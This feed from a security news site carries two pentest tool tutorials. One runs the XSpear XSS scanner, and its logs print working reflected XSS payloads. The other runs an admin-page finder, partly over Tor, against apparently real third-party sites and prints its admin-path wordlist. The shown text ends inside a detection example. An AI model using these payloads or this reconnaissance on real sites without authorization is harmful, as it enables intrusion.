Web Scanners – Information Security Newspaper | Hacking News (https://www.securitynewspaper.com)

Scan any URL for XSS (cross site scripting) vulnerability
https://www.securitynewspaper.com/2020/01/04/scan-any-url-for-xss-cross-site-scripting-vulnerability/
Sat, 04 Jan 2020 15:04:59 +0000

In recent years XSS has been found in many web applications, including those of Microsoft, Facebook and many more. XSS allows an attacker to run malicious scripts in a victim's browser. Cross site scripting (XSS) happens because of improper sanitization in the web application, and its impact can be very large. According to ethical hacking researchers of the International Institute of Cyber Security, XSS can also lead to arbitrary code execution. We will show you a tool called XSpear, which can help in finding XSS vulnerabilities in web applications. Below you can see a brief snapshot of how XSS is done.

(diagram: XSS Attack)

XSpear is a powerful XSS analysis tool used to find XSS vulnerabilities in any web application. XSpear offers different features for testing the request and response for XSS protection, and it can also be used to find blind XSS vulnerabilities.

  • For testing, we will use Kali Linux 2018.4 amd64.
  • Open a terminal and type sudo apt-get update.
  • Make sure gem is installed on your system.
  • Type sudo apt-get install gem
  • Type git clone https://github.com/hahwul/XSpear.git
  • Type cd XSpear
  • Type ls
  • Type chmod u+x XSpear-1.3.1.gem
  • Type gem install XSpear-1.3.1.gem
  • Type ls -ltr
  • Type nano Gemfile and enter the text gem 'XSpear'
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/hahwul/XSpear.git
 Cloning into 'XSpear'…
 remote: Enumerating objects: 256, done.
 remote: Counting objects: 100% (256/256), done.
 remote: Compressing objects: 100% (167/167), done.
 remote: Total 617 (delta 137), reused 164 (delta 71), pack-reused 361
 Receiving objects: 100% (617/617), 833.55 KiB | 561.00 KiB/s, done.
 Resolving deltas: 100% (332/332), done.
root@kali:/home/iicybersecurity/Downloads# cd XSpear/

root@kali:/home/iicybersecurity/Downloads/XSpear# ls
 bin                 config.json  forBurp  lib          Rakefile        README.md  XSpear-1.3.1.gem
 CODE_OF_CONDUCT.md  exe          Gemfile  LICENSE.txt  raw_sample.txt  spec       XSpear.gemspec

 root@kali:/home/iicybersecurity/Downloads/XSpear# chmod u+x XSpear-1.3.1.gem

root@kali:/home/iicybersecurity/Downloads/XSpear# ls -ltr
 total 112
 -rw-r--r-- 1 root root  2168 Jan  4 02:51 XSpear.gemspec
 -rwxr--r-- 1 root root 31744 Jan  4 02:51 XSpear-1.3.1.gem
 -rw-r--r-- 1 root root 27592 Jan  4 02:51 README.md
 -rw-r--r-- 1 root root   117 Jan  4 02:51 Rakefile
 -rw-r--r-- 1 root root  1073 Jan  4 02:51 LICENSE.txt
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 exe
 -rw-r--r-- 1 root root   108 Jan  4 02:51 config.json
 -rw-r--r-- 1 root root  3224 Jan  4 02:51 CODE_OF_CONDUCT.md
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 bin
 drwxr-xr-x 3 root root  4096 Jan  4 02:51 lib
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 forBurp
 drwxr-xr-x 2 root root  4096 Jan  4 02:51 spec
 -rw-r--r-- 1 root root   404 Jan  4 02:51 raw_sample.txt
 -rwxr--r-- 1 root root    96 Jan  4 02:57 Gemfile
 -rw-r--r-- 1 root root   641 Jan  4 03:08 Gemfile.lock

root@kali:/home/iicybersecurity/Downloads/XSpear# gem install XSpear-1.3.1.gem
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.
 warning: Passing whitelist_symbols with the 3rd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_symbols: …) instead.
 warning: Passing aliases with the 4th argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, aliases: …) instead.
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.
 warning: Passing whitelist_symbols with the 3rd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_symbols: …) instead.
 warning: Passing aliases with the 4th argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, aliases: …) instead.
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.
 warning: Passing whitelist_symbols with the 3rd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_symbols: …) instead.
 warning: Passing aliases with the 4th argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, aliases: …) instead.
 warning: Passing whitelist_classes with the 2nd argument of Psych.safe_load is deprecated. Use keyword argument like Psych.safe_load(yaml, whitelist_classes: …) instead.
  • If any error occurs while configuring the gem, type the commands below.
    • gem install selenium-webdriver
    • gem install terminal-table
    • gem install progress_bar
  • Type bundle
root@kali:/home/iicybersecurity/Downloads/XSpear# bundle
 Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root
 will break this application for all non-root users on this machine.
 Fetching gem metadata from https://rubygems.org/………
 Resolving dependencies…
 Using colorize 0.8.1
 Using highline 2.0.3
 Using options 2.3.2
 Using progress_bar 1.3.1
 Using childprocess 3.0.0
 Using rubyzip 2.0.0
 Using selenium-webdriver 3.142.7
 Using unicode-display_width 1.6.0
 Using terminal-table 1.8.0
 Using XSpear 1.3.1
 Using bundler 2.0.1
 Bundle complete! 1 Gemfile dependency, 11 gems now installed.
 Use bundle info [gemname] to see where a bundled gem is installed.
  • Type XSpear --help
root@kali:/home/iicybersecurity/Downloads/XSpear# XSpear --help
    )  (
 ( /(  )\ )
 )\())(()/(          (     )  (
((_)\  /(_))`  )    ))\ ( /(  )(
__((_)(_))  /(/(   /((_))(_))(()\
\ \/ // __|((_)_\ (_)) ((_)_  ((_)
 >  < \__ \| '_ \)/ -_)/ _` || '_|
/_/\_\|___/| .__/ \___|\__,_||_|    />
           |_|                   \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                 / \<
                                    \>       [ v1.3.1 ]
Usage: xspear -u [target] -[options] [value]
 json
 [ Options ]
     -u, --url=target_URL             [required] Target Url
     -d, --data=POST Body             [optional] POST Method Body data
     -a, --test-all-params            [optional] test to all params(include not reflected)
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
         --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
     -p, --param=PARAM                [optional] Test paramters
     -b, --BLIND=URL                  [optional] Add vector of Blind XSS
  • Starting with the given examples, type XSpear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
  • testphp.vulnweb.com is used as the test URL.
  • -u sets the target URL.
  • -v sets the verbosity; -v 2 shows the scanning logs.
root@kali:/home/iicybersecurity/Downloads/XSpear# XSpear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
    )  (
 ( /(  )\ )
 )\())(()/(          (     )  (
((_)\  /(_))`  )    ))\ ( /(  )(
__((_)(_))  /(/(   /((_))(_))(()\
\ \/ // __|((_)_\ (_)) ((_)_  ((_)
 >  < \__ \| '_ \)/ -_)/ _` || '_|
/_/\_\|___/| .__/ \___|\__,_||_|    />
           |_|                   \ /<
{\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
                                 / \<
                                    \>       [ v1.3.1 ]

Analyzing Request

[*] analysis request..
[-] [03:10:39] [200/OK] 'STATIC' not reflected
[-] [03:10:39] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [03:10:39] [200/OK] [param: cat][Found SQL Error Pattern]
[I] [03:10:39] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
w[I] [03:10:44] [200/OK] reflected onhwul=64[param: cat][reflected EH on{any} pattern]
[-] [03:11:14] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
[-] [03:11:15] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [03:11:15] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[H] [03:11:16] [200/OK] reflected <select autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[H] [03:11:16] [200/OK] reflected <textarea autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[H] [03:11:16] [200/OK] reflected <details/open/ontoggle="alert`45`">[param: cat][reflected HTML5 XSS Code]
[H] [03:11:16] [200/OK] reflected <video/poster/onerror=alert(45)>[param: cat][reflected HTML5 XSS Code]
[-] [03:11:16] [200/OK] 'cat' not reflected <script>alert(45)</script>
[H] [03:11:16] [200/OK] reflected <marquee onstart=alert(45)>[param: cat][reflected HTML5 XSS Code]
[H] [03:11:16] [200/OK] reflected <input autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[H] [03:11:17] [200/OK] reflected <audio src onloadstart=alert(45)>[param: cat][reflected HTML5 XSS Code]
[H] [03:11:17] [200/OK] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
[H] [03:11:17] [200/OK] reflected <meter onmouseover=alert(45)>0</meter>[param: cat][reflected HTML5 XSS Code]
[H] [03:11:18] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
[*] finish scan. the report is being generated..
(screenshot: XSpear scanning logs and XSpear report table, snipped)

Detailed Scanning Logs

< Available Objects >
[cat] param
 + Available Special Char: ( ' ) { ` \ } $ [ ] :
 + Available Event Handler: "onabort","onauxclick","onactivate","onanimationcancel","onafterscriptexecute","onanimationstart","onafterprint","onbeforeactivate","onafterupdate","onbeforecut","onbegin","onbeforedeactivate","onbeforeprint","onbeforeunload","onbeforecopy","onbeforepaste","onbeforeeditfocus","onbeforescriptexecute","onbeforeupdate","oncanplaythrough","onblur","onbounce","onclick","oncanplay","oncontextmenu","oncellchange","oncopy","oncontrolselect","onchange","ondatasetcomplete","ondragdrop","ondatasetchanged","ondragend","ondblclick","ondataavailable","oncut","ondeactivate","ondragenter","ondrag","onfocus","onerror","ondragstart","onend","onfinish","onerrorupdate","ondragleave","ondragover","ondrop","onfilterchange","onhashchange","onkeyup","onfocusout","oninvalid","onkeypress","oninput","onfocusin","onhelp","onkeydown","onlayoutcomplete","onloadstart","onlosecapture","onload","onloadend","onmediacomplete","onmediaerror","onmousedown","onmouseenter","onmessage","onloadstart","onmousemove","onmouseout","onoffline","onmouseup","onmouseleave","onmove","onmovestart","onmousewheel","onmoveend","onmouseover","onpageshow","onpause","onplay","onoutofsync","onpaste","ononline","onpointerleave","onpointerenter","onpointerdown","onplaying","onpointerout","onpopstate","onpointermove","onpointerover","onredo","onprogress","onreadystatechange","onrepeat","onpointerup","onpropertychange","onresizestart","onrowdelete","onresizeend","onreset","onreverse","onrowinserted","onrowexit","onresume","onresize","onrowsenter","onselectionchange","onsearch","onseek","onstop","onselect","onscroll","onselectstart","onstorage","onstart","onsubmit","ontimeupdate","onsyncrestored","ontimeerror","ontouchend","ontouchmove","ontrackchange","ontoggle","ontouchstart","ontransitionend","ontransitioncancel","onurlflip","onunhandledrejection","onvolumechange","ontransitionrun","onwaiting","whatthe=\"\"onload","onundo","onwheel","onunload"
 + Available HTML Tag: "script","audio","video","img","iframe","svg","style","frame","meta","object","embed","frameset","applet"
 + Available Useful Code: "document.cookie","document.location","window.location"


< Raw Query >
[0] http://testphp.vulnweb.com/listproducts.php?-
[1] http://testphp.vulnweb.com/listproducts.php?-
[2] http://testphp.vulnweb.com/listproducts.php?-
[3] http://testphp.vulnweb.com/listproducts.php?-
[4] http://testphp.vulnweb.com/listproducts.php?-
[5] http://testphp.vulnweb.com/listproducts.php?cat=123XsPeaR%22
[6] http://testphp.vulnweb.com/listproducts.php?cat=123rEfe6
[7] http://testphp.vulnweb.com/listproducts.php?cat=123%5C%22%3E%3Cxspear%20onhwul=64%3E
[8] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E
[9] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cselect%20autofocus%20onfocus=alert(45)%3E
[10] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Ctextarea%20autofocus%20onfocus=alert(45)%3E
[11] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cdetails/open/ontoggle=%22alert%6045%60%22%3E
[12] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cvideo/poster/onerror=alert(45)%3E
[13] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmarquee%20onstart=alert(45)%3E
[14] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cinput%20autofocus%20onfocus=alert(45)%3E
[15] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Caudio%20src%20onloadstart=alert(45)%3E
[16] http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Ciframe/src=JavaScriPt:alert(45)%3E
[17] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Cmeter%20onmouseover=alert(45)%3E0%3C/meter%3E
[18] http://testphp.vulnweb.com/listproducts.php?cat=123%22'%3E%3Ckeygen%20autofocus%20onfocus=alert(45)%3E
  • XSpear results are classified into five types:
    • VULN – Vulnerable; used for confirmed alerts or prompts.
    • LOW – low-level issue
    • MEDIUM – medium-level issue
    • HIGH – high-level issue
    • INFO – information gathering, e.g. reflected parameters or SQL error patterns.
  • The detailed report is shown in tabular form, from INFO up to HIGH level XSS findings. In the HIGH alerts above, XSpear triggers alerts through onfocus, mouseover and JavaScript error handlers.
  • XSpear also has an option to test all parameters (-a), and the user can add headers or cookies to the request for testing purposes.
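The scan log above shows XSpear's staged approach: it first appends a random marker (rEfe6 in the log) to each parameter to see whether it is reflected, then checks which special characters come back unencoded, and only then sends tag and event-handler payloads. The following added example (not XSpear's code) emulates those first two stages in Python against two constructed stand-ins for listproducts.php, one that echoes cat unescaped and one that applies html.escape, to show what the "Available Special Char" line measures and what correct output encoding changes; with_param, analyze_param, the two handlers and the severity mapping are this example's own names and assumptions.

```python
import html
import secrets
import string
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

# Characters XSpear probes once a parameter is known to reflect; the ones that
# come back unencoded are listed as "Available Special Char" in its report.
SPECIAL_CHARS = ['<', '>', '"', "'", '(', ')', '{', '}', '`', '\\', '$', '[', ']', ':']

TARGET = "http://testphp.vulnweb.com/listproducts.php?cat=123"


def with_param(url: str, param: str, value: str) -> str:
    """Return url with the given query parameter set to value (other parameters kept)."""
    parts = urlparse(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    query[param] = [value]
    return urlunparse(parts._replace(query=urlencode(query, doseq=True)))


def original_value(url: str, param: str) -> str:
    """Current (URL-decoded) value of a query parameter, or '' if absent."""
    return parse_qs(urlparse(url).query, keep_blank_values=True).get(param, [""])[0]


def analyze_param(fetch, url: str, param: str, marker: str = "") -> dict:
    """Emulate the first two stages of XSpear's per-parameter analysis.

    fetch(url) -> response body.  Stage 1 appends a marker to the parameter's
    original value and checks whether it is reflected; stage 2 wraps each
    special character in the marker and checks whether it comes back
    byte-for-byte, i.e. without HTML encoding.
    """
    marker = marker or "".join(secrets.choice(string.ascii_letters + string.digits) for _ in range(5))
    base = original_value(url, param)
    if marker not in fetch(with_param(url, param, base + marker)):
        return {"reflected": False, "special_chars": [], "severity": None}
    available = []
    for ch in SPECIAL_CHARS:
        probe = marker + ch + marker
        if probe in fetch(with_param(url, param, base + probe)):
            available.append(ch)
    # Severity mapping is this example's own assumption, loosely following the
    # INFO/HIGH levels described above: a bare reflection is INFO; if both '<'
    # and '>' survive, a tag can be injected into the text context, so HIGH.
    severity = "HIGH" if "<" in available and ">" in available else "INFO"
    return {"reflected": True, "special_chars": available, "severity": severity}


def vulnerable_listproducts(url: str) -> str:
    """Constructed stand-in for a page that echoes ?cat= into the HTML unescaped."""
    cat = original_value(url, "cat")
    return f"<html><body><h2>Products in category {cat}</h2></body></html>"


def hardened_listproducts(url: str) -> str:
    """Same page with output encoding for the HTML text context (the fix)."""
    cat = html.escape(original_value(url, "cat"), quote=True)
    return f"<html><body><h2>Products in category {cat}</h2></body></html>"


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_listproducts), ("hardened", hardened_listproducts)):
        print(name, analyze_param(handler, TARGET, "cat", marker="rEfe6"))
```

Note that the hardened page still reports the parameter as reflected (INFO) and still lets characters such as ( { $ through, which is correct: html.escape only needs to neutralise the characters that are significant in the HTML text and attribute contexts.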

Find Hidden Admin Page Of Any Website
https://www.securitynewspaper.com/2020/01/02/find-hidden-admin-page-of-any-website/
Thu, 02 Jan 2020 17:54:28 +0000

Many times, when running a scan of a URL to find its vulnerabilities, pentesters or security researchers try to find the admin page. Landing on the admin page of a website is a critical vulnerability for that website, because attackers could run session hijacking attacks or use brute force methods to steal the admin page's login credentials. Many times developers forget to patch the admin panel. According to ethical hacking researchers of the International Institute of Cyber Security, recently many vulnerabilities have come up which redirect end users to admin panels. We will show a method to find the admin page of any website.

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
 Cloning into 'okadminfinder3'…
 remote: Enumerating objects: 264, done.
 remote: Total 264 (delta 0), reused 0 (delta 0), pack-reused 264
 Receiving objects: 100% (264/264), 231.98 KiB | 293.00 KiB/s, done.
 Resolving deltas: 100% (139/139), done.
root@kali:/home/iicybersecurity/Downloads# cd okadminfinder3/
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ls
 Classes  LICENSE  LinkFile  okadminfinder.py  README.md  requirements.txt
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# chmod u+x requirements.txt
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ls -ltr
 total 48
 -rwxr--r-- 1 root root    77 Jan  2 01:54 requirements.txt
 -rw-r--r-- 1 root root  3598 Jan  2 01:54 README.md
 -rwxr-xr-x 1 root root 18022 Jan  2 01:54 okadminfinder.py
 drwxr-xr-x 2 root root  4096 Jan  2 01:54 LinkFile
 -rw-r--r-- 1 root root 11347 Jan  2 01:54 LICENSE
 drwxr-xr-x 3 root root  4096 Jan  2 01:54 Classes
  • Type pip3 install -r requirements.txt
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# pip3 install -r requirements.txt
 Collecting colorama==0.4.1 (from -r requirements.txt (line 1))
   Downloading https://files.pythonhosted.org/packages/4f/a6/728666f39bfff1719fc94c481890b2106837da9318031f71a8424b662e12/colorama-0.4.1-py2.py3-none-any.whl
 Collecting requests==2.21.0 (from -r requirements.txt (line 2))
   Cache entry deserialization failed, entry ignored
   Downloading https://files.pythonhosted.org/packages/7d/e3/20f3d364d6c8e5d2353c72a67778eb189176f08e873c9900e10c0287b84b/requests-2.21.0-py2.py3-none-any.whl (57kB)
     100% |████████████████████████████████| 61kB 81kB/s
 Requirement already satisfied: PySocks==1.6.8 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 3)) (1.6.8)
 Requirement already satisfied: argparse==1.4.0 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 4)) (1.4.0)
 Requirement already satisfied: tqdm==4.31.1 in /usr/local/lib/python3.7/dist-packages (from -r requirements.txt (line 5)) (4.31.1)
 Requirement already satisfied: idna<2.9,>=2.5 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (2.6)
 Requirement already satisfied: certifi>=2017.4.17 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (2018.8.24)
 Requirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (3.0.4)
 Requirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/lib/python3/dist-packages (from requests==2.21.0->-r requirements.txt (line 2)) (1.22)
 Installing collected packages: colorama, requests
   Found existing installation: colorama 0.3.9
     Uninstalling colorama-0.3.9:
       Successfully uninstalled colorama-0.3.9
   Found existing installation: requests 2.22.0
     Uninstalling requests-2.22.0:
       Successfully uninstalled requests-2.22.0
 Successfully installed colorama-0.4.1 requests-2.21.0
  • Type ./okadminfinder.py --help
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py --help
     ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe
usage: okadminfinder.py [-h] [-u URL] [-t] [-p PROXY] [-rp] [-r] [-v] [-U] [-i]
 optional arguments:
   -h, --help               show this help message and exit
   -u URL, --url URL        Target URL (e.g. 'www.example.com' or 'example.com')
   -t, --tor                Use Tor anonymity network
   -p PROXY, --proxy PROXY  Use an HTTP proxy (e.g '127.0.0.1:8080')
   -rp, --random-proxy      Use randomly selected proxy server
   -r, --random-agent       Use randomly selected User-Agent
   -v, --verbose            Display more informations
   -U, --update             Update OKadminFinder
   -i, --interactive        Interactive interface[other arguments not required]
  • Type ./okadminfinder.py -u testphp.vulnweb.com
  • testphp.vulnweb.com is a common testing website, used for running various scans.
  • You can also use proxies or the Tor service to hide your identity.
  • Type ./okadminfinder.py -u testphp.vulnweb.com or ./okadminfinder.py -r -u testphp.vulnweb.com
  • -r selects a random User-Agent.
  • -u sets the target URL; here the target URL is testphp.vulnweb.com
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py -u testphp.vulnweb.com
     ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe
Site testphp.vulnweb.com is stable
 Processing …:   0%|                                                                          |0/574
     [✔] http://testphp.vulnweb.com/admin/                         Admin page found!
 Processing …:   1%|▉                                                                         |7/574
     [✔] http://testphp.vulnweb.com/login.php                      Admin page found!
  • Above shows the admin pages found on testphp.vulnweb.com.
(screenshot: admin page of testphp.vulnweb.com)
  • Above you can see the admin page of the website.
  • Let's try another site.
  • Type ./okadminfinder.py -u www.arifhabib.com.pk
  • -u is used for target URL. Target URL – www.arifhabib.com.pk
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py -u www.arifhabib.com.pk
    ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe
Site www.arifhabib.com.pk is stable
 Processing …:   2%|█▋                                                                       |13/574
     [✔] http://www.arifhabib.com.pk/cpanel/                       Admin page found!
 Processing …:  32%|███████████████████████▎                                                |186/574
     [✔] http://www.arifhabib.com.pk/controlpanel/                 Admin page found!
 Processing …: 100%|████████████████████████████████████████████████████████████████████████|574/574
 Completed
 2 Admin pages found
 574 total pages scanned
   [/] Scanning over; Press Enter to Exit
  • Opening the webpage in a web browser.
(screenshot: admin page of www.arifhabib.com.pk)
  • Knowing the admin page of any website puts the website owner at potential risk.
  • Now we try with Tor anonymity.
  • Type ./okadminfinder.py --tor -u exide.com.pk/
  • --tor makes the tool use the Tor service for finding the target website's admin page.
  • To start Tor, type sudo service tor start
  • To check that the Tor service is running, type ps -ef | grep tor
  • -u is used for the target URL. Target URL – exide.com.pk/
root@kali:/home/iicybersecurity/Downloads/okadminfinder3# ./okadminfinder.py --tor -u exide.com.pk/   
     ____  __ __          __          _       _______           __
    / __ \/ //_/___ _____/ /___ ___  (_)___  / ____(_)___  ____/ /__  _____
   / / / / ,< / __ `/ __  / __ `__ \/ / __ \/ /_  / / __ \/ __  / _ \/ ___/
  / /_/ / /| / /_/ / /_/ / / / / / / / / / / __/ / / / / / /_/ /  __/ /
  \____/_/ |_\__,_/\__,_/_/ /_/ /_/_/_/ /_/_/   /_/_/ /_/\__,_/\___/_/
     version 2.5.3 created by O.Koleda & rewrited by mIcHy AmRaNe
Site exide.com.pk/ is stable
 Processing …:   0%|                                                                          |0/574
     [✔] http://exide.com.pk//admin/                               Admin page found!
 Processing …:   2%|█▋                                                                       |13/574
     [✔] http://exide.com.pk//cpanel/                              Admin page found!
 Processing …:   3%|█▉                                                                       |15/574
     [✔] http://exide.com.pk//dashboard                            Admin page found!
 Processing …:   3%|██▎                                                                      |18/574
     [✔] http://exide.com.pk//wp-login.php/                        Admin page found!
 Processing …:   5%|███▎                                                                     |26/574
     [✔] http://exide.com.pk//wp-admin/                            Admin page found!
 Processing …:   8%|██████                                                                   |48/574
     [✔] http://exide.com.pk//admin/index.php                      Admin page found!
  • Opening the Exide admin page.
(screenshot: admin page of exide.com.pk)
  • Above shows the admin pages found through Tor proxies. It might take more time while using Tor, but it will find the available admin pages.


  • Okadminfinder3 uses a pre-built list of common admin login paths, which are commonly found on website admin panels. Below you can check out the listed keywords.
  • You will find the file under the name adminpanellinks.txt in the LinkFile directory.
  • Type cat adminpanellinks.txt
root@kali:/home/iicybersecurity/Downloads/okadminfinder3/LinkFile# cat adminpanellinks.txt
 %s/admin/
 %s/admin.asp/
 %s/admin/admin.asp/
 %s/admin.aspx/
 %s/admin/admin.aspx/
 %s/admin.php/
 %s/administrator/
 %s/login.php
 %s/admin.php
 %s/user/
 %s/usuarios/
 %s/usuario/
 %s/Admin/
 %s/cpanel/
 %s/phpmyadmin/
 %s/dashboard
 %s/cms/
 %s/users/
 %s/wp-login.php/
 %s/admin/login
 %s/auth/login/
 %s/moderator/
 %s/webadmin/
 %s/webmaster/
 %s/adminarea/
 %s/bb-admin/
 %s/wp-admin/
 %s/wp-login/
 %s/wp-admin.php
 %s/userlogin/
 %s/logins/
 %s/login.html
 %s/adminLogin/
 %s/admin_area/
 %s/panel-administracion/
 %s/instadmin/
 %s/memberadmin/
 %s/administratorlogin/
 %s/panel/
 %s/forum/admin
 %s/adm/
 %s/cp/
 %s/vue-element-admin
 %s/admin/cp.php
 %s/cp.php
 %s/admincontrol/
 %s/admincp/
 %s/admin/account.php
 %s/admin/index.php
 %s/admin/login.php
 %s/admin/admin.php
 %s/admin_area/admin.php
 %s/admin_area/login.php
 %s/siteadmin/login.php
 %s/siteadmin/index.php
 %s/siteadmin/login.html
 %s/admin/account.html
 %s/admin/index.html
 %s/admin/login.html
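The list above is the probe list okadminfinder3 walks (574 entries in the scans shown). On the defending side the same list doubles as a detection signature: one source address requesting many distinct entries from it within seconds, mostly answered with 404, is what this kind of scan looks like in a web server's access log. The following added example (not part of okadminfinder3) loads the list format, parses Apache combined-format log lines and flags such a source; the list subset, the log lines, the IP addresses and the thresholds are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed subset of okadminfinder3's LinkFile/adminpanellinks.txt format
# ("%s" stands for the target host).
ADMIN_LINKS = """\
%s/admin/
%s/admin.asp/
%s/admin.php/
%s/administrator/
%s/login.php
%s/Admin/
%s/cpanel/
%s/phpmyadmin/
%s/dashboard
%s/wp-login.php/
%s/wp-admin/
%s/controlpanel/
%s/admin/index.php
"""

# Constructed Apache combined-format access-log lines: one host walking the
# list at scanner speed, one ordinary visitor, one legitimate WordPress admin.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Jan/2020:03:10:39 +0000] "GET /admin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2020:03:10:39 +0000] "GET /admin.asp/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2020:03:10:40 +0000] "GET /admin.php/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2020:03:10:40 +0000] "GET /administrator/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2020:03:10:41 +0000] "GET /cpanel/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2020:03:10:41 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Jan/2020:03:10:42 +0000] "GET /controlpanel/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Jan/2020:03:12:05 +0000] "GET /index.php HTTP/1.1" 200 4311 "-" "Mozilla/5.0"
198.51.100.4 - - [04/Jan/2020:03:12:09 +0000] "GET /login.php HTTP/1.1" 200 2210 "http://example.test/index.php" "Mozilla/5.0"
192.0.2.88 - - [04/Jan/2020:03:15:00 +0000] "GET /wp-admin/ HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def normalize(path: str) -> str:
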